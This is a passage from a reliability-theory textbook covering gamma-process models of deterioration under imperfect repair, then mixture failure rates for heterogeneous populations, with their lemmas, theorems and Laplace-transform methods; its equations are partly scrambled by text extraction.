subsequent cycles are equal to q1 , then we do not have deterioration in cycle durations starting with the third cycle. In this case, the repair process is described by the renewal process with delay (all cycles, except the first one, are i.i.d. distributed). Assume now that deterioration is modelled by the increasing sequence: 0 < q1 < q2 < q3 < ... < 1 . Therefore, Fi +1 (t ) = Pr[Wt ≥ r − qi r ] > Fi (t ) = Pr[Wt ≥ r − qi −1r ], i = 1,2,... , or, equivalently, (5.62) X i +1 < st X i , i = 1.2.... , which means that the cycle durations are ordered in the sense of usual stochastic ordering (3.40). Thus, the history of the corresponding imperfect repair process at time t is defined by the time elapsed since the last repair and the number of this repair. An obvious special case is the following geometric-type setting Fi +1 (t ) = Pr[Wt ≥ r − q i r ] , i = 1,2,... . (5.63) As in the case of the geometric process, it can be proved under the ‘natural’ assumptions on the process Wt , t ≥ 0 that the expectation of the waiting time Sn = n ∑X i 1 is converging when n → ∞ . A suitable candidate for Wt , t ≥ 0 is the gamma process. The gamma process is a stochastic process with independent, non-negative increments having a gamma distribution with identical scale parameters. It is often used to model gradual damage monotonically accumulating over time, such as wear, fatigue and corrosion (Abdel–Hammed, 1975, 1987; van Noortwijk et al., 2007). The stochastic differential equation, from which the gamma process follows, is given by Wenocur (1989). An advantage of modelling deterioration processes using gamma processes is that the required mathematical calculations are relatively straightforward. In mathematical terms, the gamma process is defined as follows. Equation (2.22) defines Virtual Age and Imperfect Repair 129 the gamma probability density function with the shape parameter α and the scale parameter λ as λα xα −1 Ga( x | α , λ ) = f (t ) = exp{−λx} . Γ(α ) The following definition derives from this. Definition 5.9. The gamma process with the shape function α (t ) > 0 and the scale parameter λ > 0 is the continuous time stochastic process Wt , t ≥ 0 such that • • W0 = 0 with probability 0 ; Independent increments W (t 2 ) − W (t1 ) in the interval [t1 , t 2 ) ∈ [0, ∞) are gamma distributed as Ga( x | α (t 2 ) − α (t1 ), λ ) , where α (t ) is a nondecreasing right-continuous function with α (0) = 0 . As follows from this definition, the accumulated (in accordance with the gamma process) deterioration in [0, t ) is described by the pdf Ga( x | α (t ), λ ) . From the properties of the gamma distribution: E[Wt ] = α (t ) α (t ) , Var (Wt ) = 2 . λ λ A special case of the increasing power function as a model for α (t ) is often used for describing deterioration in structures and other mechanical units (see, e.g., Elingwood and Mori, 1993). Note that the gamma process with stationary increments is defined by the linear shape function α t and the scale parameter λ . The gamma process with α = λ = 1 is usually called the standardized gamma process. Although realizations of the Wiener process with drift (Definition 10.1) are not monotone, this process is sometimes also used in degradation modelling (Kahle and Wendt, 2004) as its mean is increasing. An important property of the gamma process is that it is a jump process. The number of jumps in any time interval is infinite with probability one. Nevertheless, E[Wt ] is finite, as the majority of jumps are ‘extremely small’. Dufresne et al. (1991) showed that the gamma process can be regarded as the limit of a compound Poisson process. The compound Poisson process is another possibility for the deterioration process Wt , t ≥ 0 . It is defined as the following random sum: Wt = N (t ) ∑W i , (5.64) 1 where N (t ) is the NHPP and Wi > 0, i = 1,2,... are i.i.d. random variables, which are independent of the process N (t ) . Note that for a compound Poisson process, the number of jumps in any time interval is finite with probability one. Because deterioration should preferably be monotone, we can choose the best deterioration process to be a compound Poisson process or a gamma process. In the presence of observed data, however, the advantage of the gamma process over the compound Poisson process is evident: discrete measurements usually consist of deterioration increments rather than of jump intensities and jump sizes (van Noortwijk et al., 2007). 130 Failure Rate Modelling for Reliability and Risk Combining our imperfect repair model (5.63) with the relationship for the distribution of hitting time for the gamma process (Noortwijk et al., 2007) results in the following cycle-duration distributions for i = 1,2,... : Fi +1 (t ) = Pr[Wt ≥ r − q i r ] ∞ = ∫ Ga( x | α (t ), λ )dx , r −qi r = Γ(α (t ), (r − q i r )λ ) , Γ(α (t )) (5.65) where Γ(b, x) is an incomplete gamma function for x ≥ 0, b > 0 defined as ∞ Γ(b, x) = ∫ t b−1 exp{−t}dt . x Relationship (5.65) is an approximate one, as the gamma process, being a jump process, does not reach the level r ‘exactly’ but attains it with a random overshoot. In fact, it is more appropriate to describe this model equivalently in terms of imperfect maintenance rather than in terms of imperfect repair (Nicolai, 2008). Consider, for example, the first cycle. The process value just before the repair (maintenance) action is r + wr , where wr denotes the value of the defined overshoot. Therefore, in accordance with the model, the next cycle should start with deterioration level q ⋅ (r + wr ) and not with qr as in (5.65). As the expected value of the overshoot in practice is usually negligible in comparison with r , (5.65) can be considered practically exact. The considered degradation-based model of imperfect repair is the simplest one. There can be some other relevant settings. For example, the threshold r can be a random variable R . In this case, Equation (5.63) becomes Fi +1 (t ) = Pr[Wt ≥ R − q i R] , i = 1,2,... (5.66) and therefore can be viewed as a special case of the random resource approach of Section 10.2 (Equation (10.9)). Some technical matters arising from the fact that the gamma process is a jump process can be resolved by considering this model in a more mathematically detailed way as in Nicolai (2008) and in Nicolai et al. (2008). 5.8 Chapter Summary The notion of virtual age, as opposed to calendar age, is indeed appealing. The virtual age is an indicator of the current state of an object. In this way, it is an aggregated, overall characteristic. A similar notion (biological age) is often used in life sciences, but without a proper mathematical formalization. If, for example, someone has vital characteristics (blood pressure, cholesterol level, etc.) as those of a younger person, then the state of his health definitely corresponds to some younger age. On the other hand, there are no justified ways to make this statement precise, Virtual Age and Imperfect Repair 131 as the state of health of an individual is defined by numerous parameters. However, the corresponding formalization can be performed for some simple, ageing engineering items. In this chapter, we developed the virtual age theory for repairable and non-repairable items. We consider two non-repairable identical items operating in different environments. The first one operates in a baseline (reference) environment, whereas the second item operates in a more severe environment. We define the virtual age of the second item via a comparison of its level of deterioration with the deterioration level of the first item. If the baseline environment is ‘equipped’ with the calendar age, then the virtual age of an item in the second environment, which was operating for the same time as the first one, is larger than the corresponding calendar age. In Section 5.1, we developed formal models for the described age correspondence using the accelerated life model and its generalizations. Various models can be suggested for defining the corresponding virtual age of an imperfectly repaired item. The term virtual age was suggested by Kijima (1989). An important feature of this model is the assumption that the repair action does not change the baseline Cdf F (x) (or the baseline failure rate λ (x ) ) and only the starting time t changes after each repair. Therefore, the Cdf of a lifetime after repair in Kijima’s model is defined as the remaining lifetime distribution F ( x | t ) . We developed the renewal theory for this setting and also considered asymptotic properties of the corresponding imperfect repair process. We proved in Section 5.3 that, as t → ∞ , this process converges to an ordinary renewal process. Other types of imperfect repair were discussed in Sections 5.5 and 5.6. Specifically, we considered an imperfect repair model with the underlying gamma process of deterioration. The repair action decreases the accumulated deterioration to some intermediate level between the perfect and the minimal repair. The gamma process is often used to model gradual damage monotonically accumulating over time. An advantage of modelling deterioration processes using gamma processes is that the required mathematical calculations are relatively straightforward. 6 Mixture Failure Rate Modelling 6.1 Introduction – Random Failure Rate The main definitions and properties of the failure rate and related characteristics were considered in Chapter 2. A natural generalization of the notion of a classical failure rate is a failure rate that is itself random (see Section 3.1 for a general discussion). As was mentioned in Section 3.1, the usual source of a possible randomness in the failure rate of a non-repairable item is a random environment (e.g., temperature, mechanical or electrical load, etc.), which in the simplest case is modelled by a single random variable (Example 3.1). A popular interpretation is also a subjective one, when we consider a lifetime and an associated non-observable parameter with the assigned set of conditional distributions (Shaked and Spizzichino, 2001). On the other hand, repairable items can also be characterized by a random failure rate, as instants of repair are random in time. A random failure rate of this kind was considered in Chapters 4 and 5. Let the failure rate of a non-repairable item now be a stochastic process λ t , t ≥ 0 . As in the specific case of Section 3.1.1, where this process was induced by some covariate process, we will call it the hazard (failure) rate process. One of the first publications to address the issue of a random failure rate was the paper by Gaver (1963). A number of interesting models for specific hazard rate processes were considered in Lemoine and Wenocur (1985), Wenocur (1989), Kebir (1991), and Singpurwalla and Yongren (1991), to mention a few. Recall that the corresponding stochastic process for repairable systems is called the intensity process (Chapters 4 and 5). Our goal in this chapter is to analyse the simplest model for the hazard rate process when it is defined by a random variable Z (Example 3.1) in the following way: λ t = λ (t , Z ) . (6.1) It turns out that this formally simple model is meaningful for theoretical studies and for practical applications as well. Consider a lifetime T with failure rate (6.1) defined for each realization Z = z . In accordance with exponential representation (2.5), we can formally write 134 Failure Rate Modelling for Reliability and Risk ⎧⎪ t ⎫⎪ F (t , Z ) = exp⎨− ∫ λ (u , Z )du ⎬ , ⎪⎩ 0 ⎪⎭ (6.2) meaning that this equation holds for each realization Z = z . For the sake of presentation, we briefly repeat the reasoning of Section 3.1 and use the general Equations (3.3)–(3.7) for this specific case of the hazard rate process (6.1). Applying the operation of expectation with respect to Z to both sides of (6.2) results in ⎡ ⎧⎪ t ⎫⎪⎤ F (t ) = Pr[T > t ] = E[ F (t , Z )] = E ⎢exp⎨− λ (u , Z )du ⎬⎥ . ⎪⎭⎥⎦ ⎢⎣ ⎪⎩ 0 We will call F (t ) and F (t ) the observed (marginal) distribution and survival functions, respectively. It follows from this equation that the corresponding observed failure rate λ (t ) = f (t ) / F (t ) is not equal to the expectation of the random failure rate λ (u , Z ) , i.e., λ (t ) ≠ E[λ (t , Z )] . Assume for simplicity that λ (t , z ) = zλ (t ) , where λ (t ) is a failure rate for some lifetime distribution. In this case, F (t , z ) is a strictly convex function with respect to z and Jensen’s inequality can be applied ( E[ g ( X )] > g ( E[ X ]) for some strictly convex function g and a random variable X ). Therefore, using the Fubini’s theorem and assuming that E[Z ] < ∞ (see also Equations (3.5)–(3.7)) we obtain ⎧⎪ t ⎪⎫ F (t ) > exp⎨− E[λ (u , Z ]du ⎬, t > 0 . ⎪⎩ 0 ⎪⎭ (6.3) It can be proved that λ (t ) < E[λ (u , Z )] = λ (t ) E[ Z ], t > 0 . Thus, the observed failure rate is smaller than the expectation of the failure rate process for the specific case considered. In Section 6.5 we will show explicitly that this inequality is true for a more general form of λ (t , Z ) . Some other useful orderings will also be considered later in this chapter. On the other hand, owing to Jensen’s inequality, (6.3) always holds if the finite expectation is obtained with respect to λ (t , Z ) . The described mathematical setting can be interpreted in terms of mixtures of distributions. The term “mixture” in this context will be used interchangeably with the terms “observed” or “marginal”. This interpretation will be crucial for what follows in this and the following chapter. Mixtures of distributions play an important role in various disciplines. Mixture Failure Rate Modelling 135 Assume that in accordance with Equation (6.2), the Cdf F (t ) is indexed by a random variable Z in the following sense: Pr[T ≤ t | Z = z ] ≡ Pr[T ≤ t | z ] = F (t , z ) . The corresponding failure rate λ (t , z ) is f (t , z ) F (t , z ) . Let Z be interpreted as a continuous non-negative random variable with support in [a, b], a ≥ 0, b ≤ ∞ and the pdf π (z ) . Thus, the mixture Cdf is defined by b Fm (t ) = F (t , z )π ( z )dz , (6.4) a where the subscript m stands for “mixture”. As in (3.8) and (3.9), the mixture failure rate λm (t ) is defined in the following way: b λm (t ) = f m (t ) = Fm (t ) ∫ f (t , z )π ( z )dz a b ∫ F (t , z )π ( z )dz b = λ (t , z )π ( z | t )dz , (6.5) a a where the conditional pdf π ( z | t ) is given by Equation (3.10). The probability π ( z | t )dz can be interpreted as the probability that Z ∈ ( z, z + dz ] on condition that T > t . Note that, this interpretation via the conditional pdf is just a useful reasoning, whereas formally λm (t ) is defined by Equation (6.5). Our main focus will be on continuous mixtures, but some results on discrete mixtures will be also discussed. Similar to (6.4), the discrete mixture Cdf can be defined as the following finite or infinite sum (see also Example 3.3): Fm (t ) = ∑ F (t, z )π ( z k k ), (6.6) k where π ( z k ) is the probability mass of z k . The corresponding pdf and the failure rate are then defined in a similar way to the continuous case. In Section 3.1, some results on the shape of the failure rate were already discussed. The shape of the failure rate is very important in reliability analysis as, among other things, it describes the ageing properties of the corresponding lifetime distribution. Why is the understanding of the properties and the shape of the mixture failure rate so important? Apart from a purely mathematical interest, there are many applications where these issues become pivotal. Our main interest here is in lifetime modelling for heterogeneous populations (Aalen, 1988). One can hardly find homogeneous populations in real life, although most of the studies on failure rate modelling deal with a homogeneous case. Neglecting existing heterogeneity can lead to substantial errors and misconceptions in stochastic analysis in reliability, survival and risk analysis as well as other disciplines. Some results on minimal repair modelling in heterogeneous populations were presented in Section 4.7. Mixtures of distributions usually present an effective tool for modelling heterogeneity. The origin of mixing in practice can be ‘physical’ when, for example, a 136 Failure Rate Modelling for Reliability and Risk number of devices of different (heterogeneous) types, performing the same function and not distinguishable in operation, are mixed together. This occurs when we have ‘identical’ items of different makes. A similar situation arises when data from different distributions are pooled to enlarge the sample size (Gurland and Sethuraman, 1995). It is well known that mixtures of DFR distributions are always DFR (Barlow and Proschan, 1975). On the other hand, mixtures of increasing failure rate (IFR) distributions can decrease, at least in some intervals of time, which means that the IFR class of distributions is not closed under the operation of mixing (Lynch, 1999). IFR distributions usually model lifetimes governed by ageing processes, which means that the operation of mixing can dramatically change the pattern of ageing, e.g., from positive ageing (IFR) to negative ageing (DFR) ( Example 3.2). A gamma mixture of Weibull distributions with increasing failure rates was considered in this example. As follows from Equation (3.11), the resulting mixture failure rate initially increases to a single maximum and then decreases asymptotically, converging to 0 as t → ∞ (Figure 3.1). This fact was experimentally observed in Finkelstein (2005c) for a heterogeneous sample of miniature light bulbs, as illustrated by Figure 6.1. It should be noted, however, that change in ageing patterns often occurs in practice at sufficiently large ages of items, as in the case of human mortality. Therefore, the role of asymptotic methods in analysis is evident and the next chapter will be devoted to mixture failure rate modelling for large t . Thus, the discussed facts and other implications of heterogeneity should be taken into account in applications. Figure 6.1. Empirical failure (hazard) rate for miniature light bulbs Another equivalent interpretation of mixing in heterogeneous populations is based on a notion of a non-negative random unobserved parameter (frailty) Z . The term “frailty” was suggested in Vaupel et al. (1979) for the gamma-distributed Z Mixture Failure Rate Modelling 137 and the multiplicative failure rate model of the form λ (t , z ) = zλ (t ) . Since that time, multiplicative frailty models have been widely used in statistical data analysis and demography (see, e.g., Andersen et al., 1993). It is worth noting, however, that the specific case of the gamma-frailty model was, in fact, first considered by the British actuary Robert Beard (Beard, 1959, 1971). A convincing ‘experiment’ showing the deceleration in the observed failure (mortality) rate is performed by nature. It is well known that human mortality follows the Gompertz (1825) lifetime distribution with an exponentially increasing mortality rate. We briefly discussed this distribution in Section 2.3.9. Assume that heterogeneity for this baseline distribution is described by the multiplicative gamma-frailty model, i.e., λ (t , Z ) = Za exp{bt}; t ≥ 0, a, b > 0 . Owing to its computational simplicity, the gamma-frailty model is practically the only one widely used in applications so far. It will be shown later that the mixture failure rate λm (t ) , in this case, is monotone in [0, ∞) and asymptotically tends to a constant as t → ∞ , although ‘individual’ failure rates increase sharply as exponential functions for all t ≥ 0. The function λm (t ) is monotonically increasing for the real demographic values of parameters of this model. This fact explains the recently observed deceleration in human mortality at advanced age (human mortality plateau, as in Thatcher, 1999). Similar deceleration in mortality was experimentally obtained for populations of medflies by Carey et al. (1992). Interesting results were also obtained by Wang et al. (1998). While considering heterogeneous populations in different environments, the problem of ordering mixture failure rates for stochastically ordered mixing random variables arises. Assume, for example, that one mixing variable is larger than the other one in the sense of the usual stochastic ordering defined by Equation (3.40). Will this guarantee that the corresponding mixture failure rates will also be ordered in the same direction? We will show in this chapter that this is not sufficient and another stronger type of stochastic ordering should be considered for this reason. Some specific results for the case of frailties with equal means and different variances will also be obtained. There are many situations where the concept of mixing helps to explain results that seem to be paradoxical. A meaningful example is a Parondo paradox in game theory (Harmer and Abbot, 1999), which describes the dependent losing strategies which eventually win. Di Crescenzo (2007) presents the reliability interpretation of this paradox. This author compares pairs of systems with two independent components in each series. The i th component of the first system ( i = 1,2 ) is less reliable than the corresponding component of the second one (in the sense of the usual stochastic order (3.40)). The first system is modified by a random choice of its components. Each component is chosen randomly from a set of components identical to the previous ones, and the corresponding distribution of a new component is defined as a discrete mixture (with π = 1 / 2 ) of initial distributions of components of the first system. Thus, the described randomization defines a new system that is shown to be more reliable (under suitable conditions) than the second one, although initial components are less reliable than those of the second system. A formal proof of this phenomenon is presented in this paper, but the result can easily be 138 Failure Rate Modelling for Reliability and Risk interpreted in terms of certain properties of mixture failure rates to be discussed in this chapter. We start with some simple properties describing the shape of the failure rate for the discrete mixture of two distributions. 6.2 Failure Rate of Discrete Mixtures Consider a mixture of two lifetime distributions F1 (t ) and F2 (t ) with pdfs f1 (t ) and f 2 (t ) and failure rates λ1 (t ) and λ2 (t ) , respectively. Although our interest is mostly in mixtures with one governing distribution defined by Equation (6.6), we will briefly discuss in this section a more general case of different distributions ( k = 2 ). Let the masses π and 1 − π define the discrete mixture distribution. The mixture survival function and the mixture pdf are Fm (t ) = πF1 (t ) + (1 − π ) F2 (t ), f m (t ) = π f1 (t ) + (1 − π ) f 2 (t ), respectively. In accordance with the definition of the failure rate, the mixture failure rate in this case is λm (t ) = π f1 (t ) + (1 − π ) f 2 (t ) . πF1 (t ) + (1 − π ) F2 (t ) As λi (t ) = f i (t ) / Fi (t ), i = 1,2, this can be transformed into λm (t ) = π (t )λ1 (t ) + (1 − π (t ))λ2 (t ) , (6.7) where the time-dependent probabilities are π (t ) = πF1 (t ) (1 − π ) F (t ) , 1 − π (t ) = , πF1 (t ) + (1 − π ) F2 (t ) πF1 (t ) + (1 − π ) F2 (t ) which corresponds to the continuous case defined by Equation (6.5). It easily follows from Equation (6.7) (Block and Joe, 1997) that min{λ1 (t ), λ2 (t )} ≤ λm (t ) ≤ max{λ1 (t ), λ2 (t )} . For example, if the failure rates are ordered as λ1 (t ) ≤ λ2 (t ) , then λ1 (t ) ≤ λm (t ) ≤ λ2 (t ) . (6.8) Mixture Failure Rate Modelling 139 Now we can show directly that if both distributions are DFR, then the mixture Cdf is also DFR (Navarro and Hernandez, 2004), which is a well-known result for the general case. Differentiating (6.7) results in λm′ (t ) = π (t )λ1′(t ) + (1 − π (t ))λ2′ (t ) − π (t )(1 − π (t )(λ1 (t ) − λ2 (t )) 2 . Therefore, as λi′(t ) ≤ 0, i = 1,2 , the mixture failure rate is also decreasing. The proof of this fact for the continuous case can be found, e.g., in Ross (1996). It follows from (6.8) that the mixture failure rate is contained between λ1 (t ) and λ2 (t ) . As F (0) = 1 , the initial value of the mixture failure rate is just the ‘ordinary’ mixture of initial values of the two failure rates, i.e., λm (0) = πλ1 (0) + (1 − π )λ2 (0) . When t > 0 , the conditional probabilities π (t ) and 1 − π (t ) are not equal to π and 1 − π , respectively. Finally, λm (t ) < πλ1 (t ) + (1 − π )λ2 (t ), t > 0 , (6.9) which follows from Equation (6.3), where Z is a discrete random variable with masses π and 1 − π . Thus, λm (t ) is always smaller than the expectation πλ1 (t ) + (1 − π )λ2 (t ) . We shall discuss this property and the corresponding comparison in more detail for the continuous case. The next chapter will be devoted to the asymptotic behaviour of λm (t ) as t → ∞ . We will show under rather weak conditions that in both discrete and continuous cases the mixture failure rate tends to the failure rate of the strongest population. For the considered model, this means that lim t →∞ (λm (t ) − λ1 (t )) = 0 . (6.10) It is worth noting that the shapes of mixture failure rates in the discrete case can vary substantially. Many examples of the possible shapes for different distributions are given in Jiang and Murthy (1995) and in Lai and Xie (2006). For example, the possible shape of the mixture failure rate for any two Weibull distributions can be one of eight different types including IFR, DFR, UBT, MBT (modified bathtub shape: the failure rate first increases and then follows the bathtub shape). It was proved, however, that there is no BT shape option in this case. 6.3 Conditional Characteristics and Simplest Models Our main interest in these two chapters is in continuous mixtures, as they are usually more suitable for modelling heterogeneity in practical settings. In addition, the corresponding models represent our uncertainty about parameters involved, which is also often the case in practice. 140 Failure Rate Modelling for Reliability and Risk Let the support of the mixing random variable Z be [0, ∞) for definiteness. We shall consider the general case, [a, b] , where necessary. Using the definition of the conditional pdf in Equations (3.10) and (6.5), denote the conditional expectation of Z given T > t by E[ Z | t ] , i.e., ∞ E[ Z | t ] = ∫ z π ( z | t )dz . 0 An important characteristic for further consideration is E ′[ Z | t ] , the derivative with respect to t , i.e., ∞ E ′[ Z | t ] = ∫ z π ′( z | t )dz , 0 where π ′( z | t ) = − ∞ f (t , z )π ( z ) + ∫ F (t , z )π ( z )dz ∫ F (t, z )π ( z )dz 0 = λm (t )π ( z | t ) − F (t , z )π ( z )λm (t ) 0 f (t , z )π ( z ) ∞ (6.11) . ∫ F (t , z )π ( z )dθ 0 Equations (3.10) and (6.5) were used for deriving (6.11). After simple transformations, we obtain the following useful result. Lemma 6.1. The following equation for E ' [ Z | t ] holds: ∞ E ′[ Z | t ] = λm (t ) E[ Z | t ] − ∫ z f (t , z )π ( z)dz 0 ∞ . (6.12) ∫ F (t, z )π ( z )dz 0 We will now consider two specific cases where the mixing variable Z can be ‘entered’ directly into the failure rate model. These are the additive and multiplicative models widely used in reliability and lifetime data analysis. The third wellknown case of the accelerated life model (ALM) cannot be studied in a similar way. However, asymptotic theory for the mixture failure rate for this and the first two models will be discussed in the next chapter. Mixture Failure Rate Modelling 141 6.3.1 Additive Model Let λ (t , z ) be indexed by parameter z in the following way: λ (t , z ) = λ (t ) + z , (6.13) where λ (t ) is a deterministic, continuous and positive function for t > 0 . It can be viewed as some baseline failure rate. Equation (6.13) defines for z ∈ [0, ∞) a family of ‘horizontally parallel’ functions. We will mostly be interested in an increasing λ (t ) . In this case, the resulting mixture failure rate can have different intuitively non-evident shapes, whereas, as was stated earlier, a mixture of DFR distributions is always DFR. Noting that f (t , z ) = λ (t , z ) F (t , z ) and applying Equation (6.5) for this model results in ∞ λm (t ) = λ (t ) + ∫ z F (t , z )π ( z )dz 0 ∞ = λ (t ) + E[ Z | t ] . (6.14) ∫ F (t, z)π ( z )dθ 0 Using this relationship and Lemma 6.1, a specific form of E ' [ Z | t ] can be obtained: ∞ E ′[ Z | t ] = (λ (t ) + E[ Z | t ]) E[ Z | t ] − ∫ ( z λ (t ) F (t , z ) + z 0 2 F (t , z ))π ( z )dz ∫ F (t, z )π ( z )dz 0 = [ E[ Z | t ]]2 − ∫ z 2π ( z | t )dz = −Var ( Z | t ) , (6.15) 0 where Var ( Z | t ) denotes the variance of Z given T > t . This result can be formulated in the form of: Lemma 6.2. The conditional expectation of Z for the additive model is a decreasing function of t ∈ [0, ∞) , which follows from E ' [ Z | t ] = −Var ( Z | t ) < 0 . Differentiating (6.14) and using Relationship (6.15), we immediately obtain the result that was stated in Lynn and Singpurwalla (1997). Theorem 6.1. Let λ (t ) be an increasing, convex function in [0, ∞) . Assume that Var ( Z | t ) is decreasing in t ∈ [0, ∞) and Var ( Z | 0) > λ ′(0) . 142 Failure Rate Modelling for Reliability and Risk Then λm (t ) decreases in [0, c) and increases in [c, ∞) , where c can be uniquely defined from the following equation: Var ( Z | t ) = λ ′(t ) . It follows from this theorem that the corresponding model of mixing results in the BT shape of the mixture failure rate. Figure 6.2 illustrates this result for the case of linear baseline failure rate λ (t ) = ct , c > 0 . The initial value of the mixture failure rate is λm (0) = E[ Z ] . It first decreases and then increases, converging to the failure rate of the strongest population, which is ct in this case. The convergence to the failure rate of the strongest population in a general setting will be discussed in the next chapter. In addition to Lynn and Singpurwalla (1997), we have included an assumption that Var ( Z | t ) should decrease for t ≥ 0 . It seems that, similar to the fact that E[ Z | t ] is decreasing in [0, ∞) , the conditional variance Var ( Z | t ) should also decrease, as the “weak populations are dying out first” when t increases. It turns out that this intuitive reasoning is not true for the general case. The counterexample can be found in Finkelstein and Esaulova (2001), which shows that the conditional variance for some specific distribution of Z is increasing in the neighbourhood of 0 . It is also shown that Var (θ | t ) is decreasing in [0, ∞) when Z is exponentially distributed. It follows from the proof of this theorem that if Var ( Z | 0) ≤ λ ′(0) , then λm (t ) is increasing in [0, ∞) and the IFR property is preserved. We will discuss the IFR preservation property at the end of the next section. m(t) t Figure 6.2. The BT shape of the mixture failure rate Mixture Failure Rate Modelling 143 6.3.2 Multiplicative Model Let λ (t , z ) be now indexed by parameter z in the following multiplicative way: λ (t , z ) = z λ (t ) , (6.16) where, as previously, the baseline λ (t ) is a deterministic, continuous and positive function for t > 0 . In survival analysis, Model (6.16) is usually called a proportional hazards (PH) model. The mixture failure rate (6.5) in this case reduces to ∞ λm (t ) = ∫ λ (t , z )π ( z | t )dz = λ (t ) E[ Z | t ] . (6.17) λm′ (t ) = λ ′(t ) E[ Z | t ] + λ (t ) E ′[ Z | t ] . (6.18) 0 After differentiating: It follows immediately from this equation that, when λ (0) = 0 , the failure rate λm (t ) increases in the neighbourhood of t = 0 . Further behaviour of this function depends on the other parameters involved. Example 3.2 shows that, e.g., for the increasing baseline Weibull failure rate, the resulting mixture failure rate initially increases and then decreases converging to 0 as t → ∞ . Substituting λm (t ) and the pdf f (t , z ) = λ (t , z ) F (t , z ) = zλ (t ) F (t ) into Equation (6.12), similar to (6.15), the following result for the multiplicative model is obtained (Finkelstein and Esaulova, 2001): Lemma 6.3. The conditional expectation of Z for the multiplicative model is a decreasing function of t ∈ [0, ∞) , as follows from E ′[ Z | t ] = −λ (t )Var ( Z | t ) < 0 . (6.19) Equation (6.19) was also proved in Gupta and Gupta (1996) using the corresponding moment generating functions. Thus, it follows from Equation (6.17) and Lemma 6.3 that the function λm (t ) / λ (t ) is a decreasing one. This property implies that λ (t ) and λm (t ) cross at most at only one point. Example 6.1 Consider the specific case λ (t ) = const . Then Equation (6.18) reduces to λm′ (t ) = λE ′[ Z | t ] . It follows from Lemma 6.3 that the mixture failure rate is decreasing. In other words, the mixture of exponential distributions is DFR. The foregoing can be considered as a new proof of this well-known fact. Other interesting proofs can be found in Barlow (1985) and Mi (1998). Note that the first paper describes this phenomenon from the ‘subjective’ point of view. 144 Failure Rate Modelling for Reliability and Risk We end this section with some general considerations on the preservation of the mixture failure rate monotonicity property for the increasing family λ (t , z ), z ∈ [0, ∞) . As was stated in Barlow and Proschan (1975), this property is not preserved under the operation of mixing, although there are many specific cases when this preservation is observed. Example 3.2 shows that the Weibull-gamma mixture is not monotone. On the other hand, the Weibull-inverse Gaussian mixture is IFR for some values of parameters (Gupta and Gupta, 1996). The Gompertz-gamma mixture, as will be shown later in this chapter, is also IFR for certain values of parameters. Lynch (1999) had derived rather restrictive conditions for the preservation of the IFR property: the mixture failure rate λm (t ) is increasing if • F (t , z ) is log-concave in (t , z ) ; • • F (t , z ) is increasing in z for each t > 0 ; The mixing distribution is IFR. The log-concavity property is a natural assumption because in the univariate case the IFR property is equivalently defined as F (t ) being log-concave. This means that the derivative of − log F (t ) , which, owing to the exponential representation, equals λ (t ) , is positive. Therefore, the first condition seems also to be natural for F (t , z ) as well. An important and rather stringent condition is, however, the second one. It is clear, e.g., for the multiplicative model (6.16) that this condition does not hold, as the survival function ⎫⎪ ⎧⎪ t F (t , z ) = exp⎨− z ∫ λ (u )du ⎬ ⎪⎭ ⎪⎩ 0 is decreasing in z for each t > 0 . The same is true for the additive model (6.13). The choice of the IFR mixing distribution is not so important, and therefore the last assumption is not so restrictive. For the sake of computational simplicity, the gamma distribution is often chosen as the mixing one. Example 6.2 Let the failure rate be given by the following linear function: t z λ (t , z ) = 2 . Obviously, F (t , z ) is increasing in z . It can be shown that − log F (t , z ) in this case is a concave function (Block et al., 2003), but practical applications of this inverse variation law are not evident. 6.4 Laplace Transform and Inverse Problem The Laplace transform methodology in multiplicative and additive models is usually very effective. It constitutes a convenient tool for dealing with mixture failure rates and corresponding conditional expectations especially when the Laplace transform of the mixing distribution can be obtained explicitly. Mixture Failure Rate Modelling 145 Consider now a rather general class of mixing distributions. Define distributions as belonging to the exponential family (Hougaard, 2000) if the corresponding pdf can be represented as π ( z) = exp{−θ z}g ( z ) , η (θ ) (6.20) where g (z ) and η (z ) are some positive functions and θ is a parameter. The function η (θ ) plays the role of a normalizing constant ensuring that the pdf integrates to 1 . It is a very convenient representation of the family of distributions, as it allows for the Laplace transform to be easily calculated. The gamma, the inverse Gaussian and the stable (see later in this section) distributions are relevant examples of distributions in this family. The Laplace transform of π ( z ) depends only on the normalizing function η ( z ) , which is quite remarkable (Hougaard, 2000). This can be seen from the following equation: ∞ π * ( s) ≡ ∫ exp{− sz}π ( z )dz = 0 = 1 exp{− sz} exp{−θz}g ( z )dz η (θ ) ∫0 η (θ + s ) . η (θ ) (6.21) A well-known fact from survival analysis states that the failure data alone do not uniquely define a mixing distribution and additional information (e.g., on covariates) should be taken into account (a problem of non-identifiability, as, e.g., in Tsiatis, 1974 and Yashin and Manton, 1997). On the other hand, with the help of the Laplace transform, the following inverse problem can be solved analytically at least for additive and multiplicative models of mixing (Finkelstein and Esaulova, 2001; Esaulova, 2006): Given the mixture failure rate λm (t ) and the mixing pdf π ( z ) , obtain the failure rate λ (t ) of the baseline distribution. This means that under certain assumptions any shape of the mixture failure rate can be constructed by the proper choice of the baseline failure rate. Firstly, consider the additive model (6.13). The survival function and the pdf are F (t , z ) = exp{−Λ (t ) − zt}, f (t , z ) = (λ (t ) + z ) exp{− Λ (t ) − zt} , respectively, where ∞ Λ (t ) = ∫ λ (u )du (6.22) 0 is a cumulative baseline failure rate. Using Equation (6.4), the mixture survival function Fm (t ) can be written via the Laplace transform as ∞ Fm (t ) = exp{−Λ (t ) ∫ exp{− zt}π ( z )dz = exp{−Λ (t )}π * (t ) , 0 (6.23) 146 Failure Rate Modelling for Reliability and Risk where, as in (6.21), π * (t ) = E[exp{− zt}] is the Laplace transform of the mixing pdf π ( z ) . Therefore, using Equation (6.14): ∞ λm (t ) = λ (t ) + ∫ z exp{− zt}π ( z )dz 0 ∞ = λ (t ) − ∫ exp{− zt}π ( z )dz d log π * (t ) . dt (6.24) 0 It also follows from (6.14) that E[ Z | t ] = − d log π * (t ) . dt It is worth noting that this conditional expectation does not depend on the baseline lifetime distribution and depends only on the mixing distribution. The solution of the inverse problem for this special case is given by the following relationship: λ (t ) = λm (t ) + d log π * (t ) . dt (6.25) If the Laplace transform of the mixing distribution can be derived explicitly, then Equation (6.25) gives a simple analytical solution for the inverse problem. Assume, e.g., that ‘we want’ the mixture failure rate to be constant, i.e., λm (t ) = c . Then the baseline failure rate is obtained as λ (t ) = c + E[ Z | t ] . At the end of this section some meaningful examples will be considered, whereas a simple explanatory one follows. Example 6.3 Let π ( z ) be uniformly distributed in [0, b] . Then the conditional expectation can be easily derived directly from (6.24) as b 1 E[ Z | t ] = − . t exp{bt} − 1 Obtaining the limit as t → 0 results in the obvious E[ Z | 0] = b / 2 . On the other hand, this function, in accordance with Lemma 